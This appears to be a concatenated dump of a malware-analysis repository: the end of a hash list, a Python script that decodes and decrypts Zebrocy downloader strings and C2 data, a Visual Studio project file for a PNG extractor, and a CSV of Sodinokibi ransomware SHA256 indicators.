38 | d0dab4b3316dadc046d0145c1f12792e44a16588cdfa92527101d5878596acbb,b950303f1786b487a9714f8f6b08f0e6
39 | 0a371a0895677ce07c78c713f6eba87467a227834288f76757033d860b8eff1d,d80ef5d36fda12c006d898bf9018e47b
40 | f3bdd391436c80d391caafec7fcb493d5d8064abe71d32e646989c7f86484668,88c8c8249959b9c549b45ef83f963c1c
41 | d1e7d056a7fb70f44ad7f9d61a558291dd50d062f5fa0999c7baec2ec3f00ef2,d249af1fe63f4be9a21d56dc5475b02c
42 | ee17609feb45caf359f111097b63fa42c6fee3b0b7fa973fe6baeebfcc8163a2,3aa5fb43788f305ebb2b3c7fa4a425e1
43 | b372f7d2096a59e6bfedc2d747f118670094b5bf6255fa845b1ed81451a401a3,2a74697c90e45dd50bc11c7641f8a314
44 | ab2be4a6e4aa572b5fd677fc08a069610c047c737f0838014acb572b7f833633,5df9b50d8b008e1800d917d2fb5f13fc
45 | e5995fcc70cf6c6eb31f92da7a77f1cdfdf6a1eb00049bd2f198cf368917f17a,45cf495f8b0f88e8dcc3ac96aeed08a3
46 | 384ba00a4fcdd64f89ef6f5d974a04550014fdb9549ac6323756edcb4f91a7f3,79ccad8eec7f4b56377bf4ba4eea4bc0
47 | 52421c853a968ff562e67255881e45aeb6e3e29602b8da51d2278179038108db,83050f417cdf2be25cd6a639cdf90cc6
48 | cd9dc5f65656022e3622e829cdd35400b8ffeff1a9afc530fd0cb1dae248e24b,a550d1311620c8daad71ffd4562d1611
49 | 9ae8db4045a5fca5f03891900a14149a93ef5ca196afcf95ceb439b9aa5cd887,76a5c74b6efa7ab3dbc1e93519d71dff
50 | 29406614011bb311c6214cd800894c4dc93863cd4fcc7ecf9cf9050d250c86c9,37b4086cded912dcb4129f4831bea60c
51 | 01955d7aeaa49c9923caa4b4549d10a7029a8f9b3fdc2fd3e3e5fb0253caff6a,d1fa75b3137b3f215a32092fb4772eb5
52 | 2a8c73428b00b55a1a5eefe0600d84432c02da26543a6d0e4a009f294ce5275d
53 | 371d7ebd3790381f82fa857573c77cbed566a561e1e87597edb27b8eef7c1ae0,4880318d2183d55aafede257dfaa34fb
54 | 5006b352cecafdd4df49a8bf9d60a940c2dfc89fe86851f2548dbfe0ec6db922,ce43184c39fb347cca95ec74f53dd45d
55 | 8ad48b482dcd8d893dd8193acf2436383d9ddf65f55cf2ec47a4e0de3b2c22bf,8a4ce1973b7a1208b82b4e016462903c
56 | f1a474e443fb3418cb7fb557a548b62129262bb49a1c872a54b49319509f0f3d
57 | 3af051614694ca2ce1590e3c4bb54c80f99f0c0a281831b3d3847e772181e18b
58 | b9f02d6e341c8d1284331f8b1986fe641aa638e1524228947280e96c833e23ab
59 | 529995f4818b417ec1cd14438a489b78db8ae53a52d01bfb7c0cc49933be5393
60 | 4ded521f74812982835ad44efc097068fa9d8ddd7b95af5c929321b72db8853c
61 | a7063bf53e171b0c865f007fc75301375cd48b83db93b04b59a46c6f1fe735fb
62 | 398c700b8bfc3ebc3b031bc7594aabb413e90a0958b896a01999d1f78f364310
63 | 17b7c45dadb8f483e26140963f173ea5ddaf079f0996a25e251e1457447d7d34
64 | 71109177f129cdebf227e164a7edbc2fa8f5f265e182021d7d87823333f18ce9
65 | 3ea5fd07d05cdacfd2400c7a934053b448e1c570027525466207b268d56259db
66 | 00a6a7b519c4ff8f83d17f2a189b4bf5c0d9b687f6ab2eb83bdd98894272bac8
67 | 14292a33b6f6caa18c6d4df009f7630f69e80e0a725983508391a2e5648bb05c
68 | 5a44f8a82a0095393d13f25517c00f4ab2c7e337598c50d6f186eda14efd0514
69 | 583e397e780742be2a2b19f6e96ca3a2ec729bb8f6b6d73c1a994f699c005808
70 | 5795a95c513dbd0403b5601755a013f5e915bc7ed957c6695d439fd8fc7fa5ea
71 | b3a068b99ffdda13782c0339589d925f7c3d1f6641aa07488c6582a54f8d8cbf
72 | 0ed875162a3ff48d02d45e106eb9f8fb232238ec300713146c47c8a0d09dff85
73 | 


--------------------------------------------------------------------------------
/malware_specific/FancyBear/zebrocy_decrypt_artifact.py:
--------------------------------------------------------------------------------
  1 | # zebrocy_decrypt_artifact.py - script to decode Zebrocy downloader hex strings
  2 | # Takahiro Haruyama (@cci_forensics)
  3 | 
  4 | # Note: the script was used to decode and AES-decrypt C2 traffic data generated by Zebrocy payload
  5 | # I've not seen Zebrocy payload lately (2019/1Q), so commented out the code
  6 | 
  7 | import argparse, base64, re
  8 | from Crypto.Cipher import AES
  9 | from struct import *
 10 | 
 11 | g_debug = False
 12 | g_delimiter_post = ':'
 13 | g_delimiter_conf = '\r\n'
 14 | g_AES_KEY_SIZE = 38
 15 | #g_pat_hexascii = re.compile(r'[0-9A-F]{6,}')
 16 | g_pat_hexascii = re.compile(r'[0-9A-F#\-=@%$]{6,}') # downloader type1 (Delphi)
 17 | g_pat_hexascii_go = re.compile(r'(?:[2-7][0-9A-F]){2,}') # downloader type1 (Go)
 18 | g_pat_hexunicode = re.compile(ur'(?:[0-9A-F][\x00]){2,}') # downloader type2 (Delphi)
 19 | #g_pat_ascii = re.compile(r'[\x20-\x7E]{3,}')
 20 | g_pat_hexasciidummy = re.compile(r'[0-9A-Fa-z]{76,150}') # hexascii with dummy small alphabet for payload v10.3
 21 | g_MAX_HEXTEXT_SIZE = 0x200
 22 | 
 23 | g_aes_key = 'DUMMYDUMMYDUMMYDUMMYDUMMYDUMMYDUMMYDUMMY'
 24 | 
 25 | def info(msg):
 26 |     print "[*] {}".format(msg)
 27 | 
 28 | def success(msg):
 29 |     print "[+] {}".format(msg)
 30 | 
 31 | def error(msg):
 32 |     print "[!] {}".format(msg)
 33 | 
 34 | def dprint(msg):
 35 |     if g_debug:
 36 |         print "[DEBUG] {}".format(msg)
 37 | 
 38 | def decode(buf, adjust):
 39 |     newbuf = []
 40 |     for i in range(0, len(buf), 2):
 41 |         if buf[i] and buf[i+1]:
 42 |             newbuf.append(chr(int(buf[i] + buf[i+1], 16) + adjust))        
 43 |     return "".join(newbuf)
 44 | 
 45 | def extract_ascii(pat, data):
 46 |     for match in pat.finditer(data):
 47 |         yield match.group().decode("ascii"), match.start()
 48 | 
 49 | def extract_unicode(pat, data):
 50 |     for match in pat.finditer(data):
 51 |         yield match.group().decode("utf-16le"), match.start()    
 52 | 
 53 | def extract_hexkey(s):
 54 |     hexkey = [x for x in s if ord(x) < ord('Z')]
 55 |     return ''.join(hexkey)
 56 | 
 57 | def decrypt_hextext(hexenc, aes=None, adjust=0):
 58 |     try:
 59 |         hexdec = decode(hexenc, adjust)
 60 |     except (ValueError, IndexError):
 61 |         return ''
 62 |     dprint('hextext to bin: {}'.format(repr(hexdec)))
 63 |     
 64 |     if aes and len(hexdec) > 8 and unpack("<Q", hexdec[:8])[0] <= len(hexdec[8:]) and len(hexdec[8:]) % 0x10 == 0:
 65 |         size = unpack("<Q", hexdec[:8])[0]
 66 |         dprint('plain text size = {:#x}'.format(size))
 67 |         enc = hexdec[8:]
 68 |         #try:
 69 |         dec = aes.decrypt(enc)
 70 |         #except ValueError:
 71 |         #return ''
 72 |         dprint('AES-decrypted with null bytes = {}'.format(repr(dec)))
 73 |         plain = dec[:size]
 74 |         dprint('AES-decrypted plain text = {}'.format(plain))
 75 |         return plain
 76 |     else:
 77 |         #dprint('plain text size {:#x} is larger than encrypted data size {:#x}. this string is not encrypted'.format(size, len(hexdec[8:])))
 78 |         if len(hexdec) < g_MAX_HEXTEXT_SIZE:
 79 |             success('decoded hextext: {}'.format(hexdec))
 80 |             return hexdec
 81 |         else:
 82 |             return ''
 83 | 
 84 | def parse(buf, post=False):
 85 |     dprint('now parsing: {}'.format(buf))
 86 |     if post:
 87 |         success('AES-decrypted POST file content: {}'.format(buf))
 88 |         b64enc, txt = buf.split(g_delimiter_post)
 89 |         b64dec = base64.decodestring(b64enc)
 90 |         success('base64 decoded = {}'.format(b64dec))
 91 |         vid = txt.split('-')[0]
 92 |         hexdec = decode(vid, 0)
 93 |         vsn = unpack("<I", hexdec[:4])[0]
 94 |         phn = hexdec[4:]
 95 |         success('victim ID = {} (VolumeSerialNumber = {:#x}, part of hostname = {})'.format(vid, vsn, phn))
 96 |     else:
 97 |         hexdec = decode(buf, 0)
 98 |         dprint('hextext to bin #2: {}'.format(repr(hexdec)))
 99 |         hexparams = hexdec.split(g_delimiter_conf)
100 |         try:
101 |             params = [decode(x, 0) for x in hexparams]
102 |         except (ValueError, IndexError):
103 |             params = hexparams
104 |         success('{}'.format(params))
105 | 
106 | def main():    
107 |     parser = argparse.ArgumentParser()
108 |     parser.add_argument('-k', '--key', default=g_aes_key, help="AES key")
109 |     parser.add_argument('-c', '--choose', action='store_true', help="choose AES key from decoded strings")
110 |     parser.add_argument('-t', '--text', help="encrypted hextext")    
111 |     parser.add_argument('-p', '--post', action='store_true', help="the text is HTTP POST file content")
112 |     parser.add_argument('-f', '--file', help="binary file with encrypted hextexts")
113 |     parser.add_argument('--debug', '-d', action='store_true', help="print debug output")
114 |     parser.add_argument('--uni', '-u', action='store_true', help="unicode hextext mode")
115 |     parser.add_argument('--strict', '-s', action='store_true', help="strict hextext mode")
116 |     args = parser.parse_args()
117 |     global g_debug
118 |     g_debug = args.debug    
119 | 
120 |     info('start')
121 | 
122 |     aes = AES.new(args.key[:0x20], AES.MODE_ECB)
123 |     if args.text:
124 |             plain = decrypt_hextext(args.text, aes)
125 |             parse(plain, args.post)        
126 |     if args.file:
127 |         with open(args.file, 'rb') as f:
128 |             data = f.read()
129 |             stored = '' # for divided hextext
130 |             if args.uni:
131 |                 for s,p in extract_unicode(g_pat_hexunicode, data):
132 |                     dprint('{:#x}: hextext found'.format(p))
133 |                     plain = decrypt_hextext(s, None, 1)
134 |             else:
135 |                 ''' # for AES decryption of payload strings
136 |                 if args.choose: # for payload 10.3
137 |                     for s,p in extract_ascii(g_pat_hexasciidummy, data):
138 |                         dprint('{:#x}: possible hexkey with dummy small chars found (payload v10.3)'.format(p))
139 |                         hexkey = extract_hexkey(s)
140 |                         if len(hexkey) == g_AES_KEY_SIZE * 2:
141 |                             key = decode(hexkey)
142 |                             success('possible AES key acquired: {}'.format(key))
143 |                             aes = AES.new(key[:0x20], AES.MODE_ECB)
144 |                 '''
145 |                 pat = g_pat_hexascii_go if args.strict else g_pat_hexascii
146 |                 for s,p in extract_ascii(pat, data):
147 |                     dprint('{:#x}: hextext found {}'.format(p, s))
148 |                     s = re.sub(r"[#\-=@%$]", "", s) # delete dummy characters
149 |                     plain = decrypt_hextext(s, aes)
150 |                     dprint('len(s)={:#x}, len(plain)={:#x}'.format(len(s), len(plain)))
151 |                     ''' # for AES decryption of payload strings
152 |                     if len(s) > g_MAX_HEXTEXT_SIZE and plain == '':
153 |                         dprint('{:#x}: possible divided config block'.format(p))
154 |                         stored += s
155 |                         plain = decrypt_hextext(stored, aes)
156 |                         if plain != '':
157 |                             stored = ''
158 |                     if args.choose and len(plain) == g_AES_KEY_SIZE:
159 |                         success('possible AES key acquired: {}'.format(plain))
160 |                         aes = AES.new(plain[:0x20], AES.MODE_ECB)                
161 |                     if g_pat_hexascii.match(plain) and len(plain) % 2 == 0:  
162 |                         parse(plain)
163 |                     '''
164 |         
165 |     info('done')    
166 | 
167 | if __name__ == '__main__':
168 |     main()
169 | 


--------------------------------------------------------------------------------
/png_extract/png_extract.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{54038B35-6E2F-492D-AD75-F42CBBCF6A9C}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>png_extract</RootNamespace>
 25 |     <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
 26 |   </PropertyGroup>
 27 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 28 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 29 |     <ConfigurationType>Application</ConfigurationType>
 30 |     <UseDebugLibraries>true</UseDebugLibraries>
 31 |     <PlatformToolset>v140</PlatformToolset>
 32 |     <CharacterSet>Unicode</CharacterSet>
 33 |   </PropertyGroup>
 34 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 35 |     <ConfigurationType>Application</ConfigurationType>
 36 |     <UseDebugLibraries>false</UseDebugLibraries>
 37 |     <PlatformToolset>v140</PlatformToolset>
 38 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 39 |     <CharacterSet>Unicode</CharacterSet>
 40 |   </PropertyGroup>
 41 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 42 |     <ConfigurationType>Application</ConfigurationType>
 43 |     <UseDebugLibraries>true</UseDebugLibraries>
 44 |     <PlatformToolset>v140</PlatformToolset>
 45 |     <CharacterSet>Unicode</CharacterSet>
 46 |   </PropertyGroup>
 47 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 48 |     <ConfigurationType>Application</ConfigurationType>
 49 |     <UseDebugLibraries>false</UseDebugLibraries>
 50 |     <PlatformToolset>v140</PlatformToolset>
 51 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 52 |     <CharacterSet>Unicode</CharacterSet>
 53 |   </PropertyGroup>
 54 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 55 |   <ImportGroup Label="ExtensionSettings">
 56 |   </ImportGroup>
 57 |   <ImportGroup Label="Shared">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 60 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 63 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 64 |   </ImportGroup>
 65 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 69 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 70 |   </ImportGroup>
 71 |   <PropertyGroup Label="UserMacros" />
 72 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 73 |     <LinkIncremental>true</LinkIncremental>
 74 |   </PropertyGroup>
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 76 |     <LinkIncremental>true</LinkIncremental>
 77 |   </PropertyGroup>
 78 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 79 |     <LinkIncremental>false</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 82 |     <LinkIncremental>false</LinkIncremental>
 83 |   </PropertyGroup>
 84 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 85 |     <ClCompile>
 86 |       <PrecompiledHeader>Use</PrecompiledHeader>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <Optimization>Disabled</Optimization>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 98 |     <ClCompile>
 99 |       <PrecompiledHeader>Use</PrecompiledHeader>
100 |       <WarningLevel>Level3</WarningLevel>
101 |       <Optimization>Disabled</Optimization>
102 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
103 |       <SDLCheck>true</SDLCheck>
104 |     </ClCompile>
105 |     <Link>
106 |       <SubSystem>Console</SubSystem>
107 |       <GenerateDebugInformation>true</GenerateDebugInformation>
108 |     </Link>
109 |   </ItemDefinitionGroup>
110 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
111 |     <ClCompile>
112 |       <WarningLevel>Level3</WarningLevel>
113 |       <PrecompiledHeader>Use</PrecompiledHeader>
114 |       <Optimization>MaxSpeed</Optimization>
115 |       <FunctionLevelLinking>true</FunctionLevelLinking>
116 |       <IntrinsicFunctions>true</IntrinsicFunctions>
117 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <SDLCheck>true</SDLCheck>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
123 |       <OptimizeReferences>true</OptimizeReferences>
124 |       <GenerateDebugInformation>true</GenerateDebugInformation>
125 |     </Link>
126 |   </ItemDefinitionGroup>
127 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
128 |     <ClCompile>
129 |       <WarningLevel>Level3</WarningLevel>
130 |       <PrecompiledHeader>Use</PrecompiledHeader>
131 |       <Optimization>MaxSpeed</Optimization>
132 |       <FunctionLevelLinking>true</FunctionLevelLinking>
133 |       <IntrinsicFunctions>true</IntrinsicFunctions>
134 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
135 |       <SDLCheck>true</SDLCheck>
136 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Console</SubSystem>
140 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
141 |       <OptimizeReferences>true</OptimizeReferences>
142 |       <GenerateDebugInformation>true</GenerateDebugInformation>
143 |     </Link>
144 |   </ItemDefinitionGroup>
145 |   <ItemGroup>
146 |     <Text Include="ReadMe.txt" />
147 |   </ItemGroup>
148 |   <ItemGroup>
149 |     <ClInclude Include="stdafx.h" />
150 |     <ClInclude Include="targetver.h" />
151 |   </ItemGroup>
152 |   <ItemGroup>
153 |     <ClCompile Include="png_extract.cpp" />
154 |     <ClCompile Include="stdafx.cpp">
155 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
156 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
157 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
158 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
159 |     </ClCompile>
160 |   </ItemGroup>
161 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
162 |   <ImportGroup Label="ExtensionTargets">
163 |   </ImportGroup>
164 | </Project>


--------------------------------------------------------------------------------
/threat_hunting/IOCs/IOCs_2019_Q3_Sodinokibi-Hashes.csv:
--------------------------------------------------------------------------------
  1 | Description,SHA256
  2 | Exectable,00d015edbfb34e16b5b4086d25174ae435ca86d8cd267e0ed9b32db7d1d8ae2f
  3 | Exectable,046a416f4a41da0874c49c2f279ecc5d27f196e8a9086f9f250830c570113905
  4 | Exectable,064b5a8a6527e9b7b857c78417c9701ccab7f6fd0cfcc367aa73a98a91e1f6a2
  5 | Exectable,069d993c71e2c78fd73fdef9ce4ced7fe0ce1b49f458a3ec3fae53208d382f3c
  6 | Exectable,0832b9544b38aeb0e7731cfc3a676365224472a62d3628a0dfb838d3e5202e1c
  7 | Exectable,08542ea965f7ac97c90635444860c5d35a8e8e81c7edf3ddbf6c1736a8c61b63
  8 | Exectable,0ae199c13e033f6e63a388151e33c00ec374e1716a40e4bc1769b9ca559852ca
  9 | Exectable,0aebc3c9dd12779c489012bf45a19310576ec0e767ac67d1c455839302465afa
 10 | Exectable,0e375ab01a08cd6827ce399f43cbf35b3495eb4ae45fdbad18b812513b68af94
 11 | Exectable,12096093901347150ac72d6c9c1cbacf4de7d6a51ef1ab4cddc06f85311dd8ab
 12 | Exectable,139a7d6656feebe539b2cb94b0729602f6218f54fb5b7531b58cfe040f180548
 13 | Exectable,139f7532810e92346ff3b103064a26e460deb05005104cc30f9f4e2b3eab595e
 14 | Exectable,1501f261a66eefce47dc47cb8a426107c4b694a41b5b9fd000d0ad2ea76d8e34
 15 | Exectable,151271bf05310f94cd33cba3eb90be264edc4828c04e4e82f492b8e2576ee7a6
 16 | Exectable,17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467
 17 | Exectable,17ffd90d20cbd49c4e0d65a484eeae65a107d5bad9582afc51c4ead8bbc147e1
 18 | Exectable,1937098609fbbda1b470811a7ffe5fa044058655722d84bd029050d54f2b1496
 19 | Exectable,1e1653773e590ea0cfda3b5e772b1f03c9a08a3cd595061100e2f2c50a3053a5
 20 | Exectable,1f7b15f6cf07c5943ce8ab5bfd0700e4919808fca4260ffd2a509100d45fadaf
 21 | Exectable,200d374121201b711c98b5bb778ab8ca46d334e06f2fc820a2ea7e70c251095e
 22 | Exectable,207b3353fa8bcb64966ba9f126e62753a00d22ac3702f2bdd34ec658d6d6144c
 23 | Exectable,2181579e0125e8087a3269ee8a90a973307f67eceb7122fdc7463db6bc5050b5
 24 | Exectable,245f43b7d93d48e12db0082955712b7a229127fdd37e5b162007db85c463cca6
 25 | Exectable,2a55b2836ddb2eb3afe78e360d3e59de661877939f62a47fc9e72186fc9b69c9
 26 | Exectable,2a995ca24af128edbd324bd501c205e8f788e78a0febd23b4f9249e6eca1825c
 27 | Exectable,2ea781140f7e86c63b636249b5fdba9828661bdd846fd95c195c5b986b84a507
 28 | Exectable,30980f00bc1bcba4e2ea3e32ebd7feb759c87fa2593a6164bccddfcb26846933
 29 | Exectable,30d11e193a44c2a9807b073854de1370977ae7c3e99b0243f83d34b261eb2b9e
 30 | Exectable,32a72f3bc54b65651ec263c11e86738299d172043a9cdd146001780501c75078
 31 | Exectable,34ba7e6dd88471c7aec1612270abd57d445030906375722a78a9e73ce6097fdd
 32 | Exectable,34f01b17b678fc4babcef41731d708cb16bc33a284d87b8675605d0bafdeb20c
 33 | Exectable,36fa3f72afc2dd6f206a295fc618038fef5e241bc48bd5451ac9bab9128734dd
 34 | Exectable,39c70f85e6fe3000cd7383e324b705b6a709171e07daada3e2d56b2004d33b53
 35 | Exectable,3d96d4d5e89b643897cad61778f54f8741338a3f3f9acceab965c417b35a74bd
 36 | Exectable,41050ea37693db3f76887d9fbcc6b2eefd4357ab7f49e3cccf682b5af49a68bc
 37 | Exectable,4748e9729f2e0b1bb151950cdaa75d51ad74612a1c12ff124a492a9a67c2f49b
 38 | Exectable,4d3fb0e2d5ba3f2eecbb2ac62a0a73581c57a2be39246d861657f21fe2d2c6e6
 39 | Exectable,4e1317c219c4bf78403e8e8d78c694598996236f629b96c904ae02fa05764a10
 40 | Exectable,507f7b533834cd9445983a89766cb35c6f71857658d7f7b028d4ffbc941cfacc
 41 | Exectable,509c851e9914e818e1b925c9b60126b40b66b0b57fc3c7a3ecc46d28dcff5527
 42 | Exectable,51923ec74555541e3567f87bdc189934003b9d32403840cbc1ff5f8b2dd4df05
 43 | Exectable,51f7bcc2da2c7a0704f1f537c42279b0fa3d3a72808bc8938880de88b21945b9
 44 | Exectable,564d9dd23e81bb35ef2c6d8ff8976c9cd88a45291430b3758ed475e5d238c5c7
 45 | Exectable,58cffa69e8b4f26209da073a6b8cbb6ede9b2a3f7646d08c91b11df729a6b9aa
 46 | Exectable,5928db8b7b1714ead51392ad809242cd5a158defefe5309f3ae0238c20a500ab
 47 | Exectable,5c959580adf1fbdfea872ece4d29ee6a8319a88273a9923988ef8be4197833bd
 48 | Exectable,5cc16295598bdc30829a906f3187a60d3c52e7a939ecd2b4dbb4e810ebc281f5
 49 | Exectable,5fe8e804cc0e7d211019bf37dbb18e4a00af24be11cc9407fac6d648c01716fb
 50 | Exectable,61ea9401c86f28db49a766b180b1b43335da1aadb9e8cff5441670d05ee8a0b6
 51 | Exectable,6727edbb5d6abee908851a8c5fd7b4aca6d664634fdcdfc15e04502b960abbc5
 52 | Exectable,6cd6c3ab26dbc9e0725d4db991895f4b48ae3c6b3d3c67d98dadcac81c7cdc5c
 53 | Exectable,6d642157d0c3fbb0bf52c8920d5f06b40b907558645d53f8c18c48746d17bdd4
 54 | Exectable,6eb8e811ba663ffee249a3debc32646070d3662c34cc99a5f580c750c46c71ed
 55 | Exectable,6edef9c0343c53ef394251a1bf0a890bfc0c51aeb283d0a4a4b15c5294ef484d
 56 | Exectable,6efd9aae5e112418bd43ab48ec4a1fce191c7503fcd11fdb95e89ad0217adb7a
 57 | Exectable,6f286e8322e4799f8afe0f431dec82e955f193e68e81d1ec0a94f7597840317c
 58 | Exectable,7047df7a1efe3c1cecc26445b59ac74fd912c9e77ee01f74d653dd20d5edbd0d
 59 | Exectable,754c6c376b1e322e03fecaeac592971cc2a07f614d71529939a46046d1d87695
 60 | Exectable,794da0ca9dd97421afd80b3f9aaf6e25dcb969adc296825a439feac58a77025a
 61 | Exectable,7a512c1dca5da7cb27d59e002a3aaa42073bfec1af23ad8cf73f967617a2a9dc
 62 | Exectable,7bafd5de1b6724962ab920f71031978a101055f061ae3cc21db8bb9fa64c5829
 63 | Exectable,7d0a7b508d1ccc7ce49b234a25bff26c487a85ec7e81ddf6325e8e301516ceae
 64 | Exectable,7e959a5f638fa02c0c29d21e3076c987a5a9e1aaa6024c3a47167f1398387f44
 65 | Exectable,7ea8dd20165e86544214bd59b7afc09872aac6dacd41c5c1683c3cb86d88b9f4
 66 | Exectable,80bbe933cc68fd5837b0ba84f17b9f796918125c52321d3d504468e837239765
 67 | Exectable,834ceb76ddfe5549b0dd8e10891949e9fc4dc23b68517fce991d7efdc7ab8eb2
 68 | Exectable,84f909f2a044110a830148d98d47351342a2f1c9d5f75e6b8801ff34c9e9fa98
 69 | Exectable,85d76be0e7a1f112d8b7e221f5f95cf6a665338f96ceaea1fe495c7903ab4a61
 70 | Exectable,861bc212241bcac9f8095c8de1b180b398057cbb2d37c9220086ffaf24ba9e08
 71 | Exectable,8704b9baefe5060c0622b14a3930b8901a0cc5ce53f9395b1f2cc3efd7d5bd69
 72 | Exectable,87883ac1ef972338d4e632f4bca5ad222f21d95f77dfecace09f30feba37d173
 73 | Exectable,89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4
 74 | Exectable,8ab99ac368b338310cb1e130d9971aedcdd3b79e5c7143e8b4b0a8ce894f9c78
 75 | Exectable,8b15999cff808e9477d25bf0f839ac7c93fa4e62710fb6ae29d33787f1a05f12
 76 | Exectable,8c8481c65f40fb55fcd8aa077f3d20702f366c365e276ab7c3fa03a98310a277
 77 | Exectable,90c9b6460c240177644d028458874167fedf7ca459381dde17d44446bb9ba501
 78 | Exectable,917f1feea1242d962205ba1827d036f55482e83ac4008a84c518479a3364d4e5
 79 | Exectable,938248b6428d12e57d4bcad2c36b369599b5eb7687f16c0998ca967d9c8e228c
 80 | Exectable,9539c6b525e9ea6f0d84979a7285cdba416bbc134c0d6985fdf5d86607b30383
 81 | Exectable,95f29f45c33d66b22e71b0fc0c1c03f7415f08b30dfc9bea0902c19d29a0b137
 82 | Exectable,963e31fef7c8db9e002c56ee30fd3cd4b240db466bc23687979e2f161ba5606e
 83 | Exectable,97612c95aa764cb2a4da61dd6c25192eb2dbc8d8d75d9d0fe57fa0101157e28f
 84 | Exectable,984e8a13d4ad8e1dca468337ecba4f221688ef6b96e9d1238e5c1bc92e4dc3b7
 85 | Exectable,9a995d6a6a6764632e7de12e48462b352c04d81d1cbf30920ffc55f9b0ad8794
 86 | Exectable,9e31d426701cf1e9ca72f71e88a3f50978ab2d67088e96f1c3b954df1e673bdf
 87 | Exectable,9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae
 88 | Exectable,9fed4aec732e2b564f0e63f37893b3c00deab31580580eb3045541a05cae8766
